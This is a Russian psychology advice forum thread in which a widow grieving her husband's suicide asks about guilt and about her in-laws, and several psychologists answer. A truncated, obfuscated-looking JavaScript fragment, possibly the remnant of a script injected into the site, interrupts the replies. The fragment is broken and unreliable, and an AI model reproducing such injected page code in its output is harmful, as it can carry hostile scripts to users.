Смерть мужа не дает покоя

Екатерина 04.08.2015

Здравствуйте,у меня умер муж,покончел жизнь самоубийством.осталась одна с тремя детьми.чувство что я что то ему не додала,не договорила,что я могла б все изменить,что он может и не сделал все так если я б повела себя подругому с ним не дает мне покоя.так и его родные после смерти обвиняют меня в случившимся,что я его довела,говорят и пишут много всякой грязи,так и после всего что сказано ими меня доводит до нервного срыва,так они еще и хотят видить детей,а я пока не готова им дать такой возможности пока они не изменят свой нострой,боюсь что все это скажется плачевно для меня с детьми.помогите мне 29 лет,работаю продавцом в магазине

Екатерина, то, что Ваш муж так расстался с жизнью, - это только его решение. Он не справился со своей жизнью. Мы не можем сейчас узнать причины этого. Вы испытываете много вины сейчас, ее усугубляют и Ваши близкие, к сожалению. Даже когда близкие уходят естественной смертью, люди часто начинают сожалеть о чем-то, чего не сказали или не сделали. От чувства вины трудно избавиться. Но это все же - его решение и его ответственность. Вам сейчас нужна поддержка и жаль, что Ваши родные не могут ее оказать. Тем не менее не стоит сейчас мстить им запретом видеть детей. Дети ни в чем не виноваты. И они тоже наверняка нуждаются в поддержке и в любви родных. А запрет видеться с ними может еще больше способствовать появлению у них ощущения, что жизнь рушится. Должно быть в их жизни что-то, что должно оставаться незыблемым. Они потеряли отца, не стоит лишать их родных, хоть Вы и обижены на них. Со временем их злость на Вас пройдет. Надеюсь, рядом с Вами есть кто-то, кто все же может Вас поддержать в такой непростой для Вас период жизни. Не бойтесь просить о помощи.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

С уважением, Умилина Елена Васильевна, психолог г. Саров

Здравствуйте, Екатерина.

Сочувствую Вам.

Человек не может нести ответственность за решения другого человека.
Мы делаем только то, что мы можем делать. Если бы Вы могли что-то делать иначе, Вы бы это сразу сделали иначе.

Екатерина

я пока не готова им дать такой возможности пока они не изменят свой нострой

Вы приняли верное решение. Сейчас ни Вам, ни Вашим детям не нужен новый стресс. Будьте тверды в своем решении, от этого зависит Ваше здоровье и здоровье Ваших детей.

Для того, чтобы легче пережить случившееся и снять с себя мучительное чувство вины, обратитесь за помощью к психологу/психотерапевту.

С уважением,

Пабст Любовь Вениаминовна,психолог Дрезден, консультации по Skype

Силина Марина Валентиновна

Екатерина, здравствуйте.
Вы оказались в ужасной ситуации. произошло страшное событие, наверняка, оно было неожиданное для Вас. И остаться с тремя детьми на руках, это ужасно... То, что произошло для всех стало ударом. И для  родственников мужа тоже. Вы сейчас переживаете боль утраты. А при этом всегда появляется много чувств- в том числе злость, что он так сделал, оставил Вас в таком положении, и чувство вины, что вы ему что-то не додали, не сделали, а могли бы. Тем более, родственники добавляют впечатлений. Это надо как то пережить. Это всегда трудно. А родственники есть родственники. Для Ваших детей они родные люди. И вряд ли нужно их ограничивать от общения. Дети не такие уж глупенькие, чтобы не видеть реальную картину. Поэтому не бойтесь, что родственники как- то могут на них повлиять. Старайтесь сохранять родственные отношения. Тем более, это очень важно для Ваших детей. С уважением.

Силина Марина Валентиновна, психолог Иваново